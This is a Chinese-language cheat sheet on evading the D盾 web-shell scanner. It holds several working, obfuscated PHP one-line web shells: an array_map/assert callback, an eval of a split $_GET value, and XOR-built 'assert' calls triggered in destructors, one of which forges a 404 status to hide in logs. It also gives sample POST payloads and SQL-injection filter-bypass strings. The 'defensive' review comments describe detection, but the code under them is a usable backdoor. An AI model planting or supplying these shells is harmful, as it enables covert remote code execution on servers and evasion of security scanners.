安装
下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip
使用说明
http://www.d99net.net/News.asp?id=106
免杀
array_map | assert
<?php
// Review note (defensive): request-driven code execution hidden behind a callback.
// test() forwards its first argument to array_map() as the callback and its second
// as the data, so the callback name never appears at the array_map() call site.
// The caller passes the bareword `assert` and an array holding $_POST['x'].
// On legacy PHP, where that bareword resolves to the string 'assert' and assert()
// still evaluates string arguments, the POST field is run as code; string
// evaluation in assert() was removed in PHP 8.
// Detection: flag callback-taking functions (array_map and similar) whose callback
// or data traces back to a request superglobal, and any use of assert as a callable.
// Hardening: run a supported PHP release and set zend.assertions=-1 in production.
function test($a, $b) { array_map($a, $b); } test(assert, array($_POST['x'])); ?>
mb_substr
<?php
// Review note (defensive): eval() of a query-string value.
// $_GET['1'] is split with mb_substr() into its first character and the following
// (up to 9999) characters; the two pieces are concatenated again and handed to
// eval(). The split/rejoin leaves the value unchanged and only means the argument
// of eval() is no longer the superglobal expression itself.
// Detection: taint tracking has to follow string slicing and concatenation, not
// only a direct eval($_GET[...]); any eval() on request-derived data is a finding.
$m=$_GET['1']; $a=mb_substr($m,0,1); $b=mb_substr($m,1,9999); eval($a.$b); ?>
PHP一句话
// Review note (defensive): destructor-triggered variable-function call.
// LTDS::__destruct() XORs pairs of string literals, concatenates the six results
// into $HLWV and calls $HLWV as a function with $this->OX as its argument; the `@`
// suppresses any error raised by that call.
// OX is filled from $_POST['ua8'], base64-decoded first when $_GET['id'] is set, and
// the destructor runs when the object is destroyed, i.e. after that assignment.
// The callable's name never appears as a literal anywhere in the file.
// Detection: flag `$var(...)` calls inside magic methods such as __destruct, XOR
// between string literals feeding a callable, and request superglobals assigned to
// object properties; in HTTP logs, look for POST bodies carrying PHP statements or
// their base64 form.
class LTDS { public function __destruct() { $bxo='X'^"x39"; $woa='?'^"x4c"; $ukt='K'^"x38"; $gud='d'^"x1"; $fbu='_'^"x2d"; $agx='<'^"x48"; $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx; return @$HLWV($this->OX); } } $ltds=new LTDS(); @$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8']; http://www.xxx.com/shell.php POST: ua8=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随意更改) POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码
异或 | PHP一句话
<?php
// Review note (defensive): same destructor pattern, with a forged status line.
// header('HTTP/1.1 404') makes every response from this file report 404 even though
// the script exists and runs, so status-code-based log triage will skip it.
// ZXVG::__destruct() XORs pairs of string literals, joins the six results into $db
// and calls $db as a function with $this->c; `@` suppresses errors on the call and
// on the property assignment. $this->c is taken unmodified from $_POST['mr6'].
// Detection: flag `$var(...)` calls inside __destruct, XOR between string literals
// feeding a callable, and request superglobals assigned to object properties; in
// access logs, correlate POST requests answered with 404 against files that exist
// on disk under the web root.
header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"x47"; $_1='C'^"x30"; $_2='A'^"x32"; $_3='v'^"x13"; $_4='J'^"x38"; $_5='f'^"x12"; $db=$_0.$_1.$_2.$_3.$_4.$_5; return @$db($this->c); } } $zxvg=new ZXVG(); @$zxvg->c=$_POST['mr6'];
注入绕过
(1) and 1=1和and 1=2 (2) %26%26 True 和 %26%26 False (3) Xor True 和 Xor False (4) http://127.0.0.1/sqli.php?id=1/**//*!order*//**//*!by*//**//*!1*/ #order by 内联 (5) union select 内联 (6) 盲注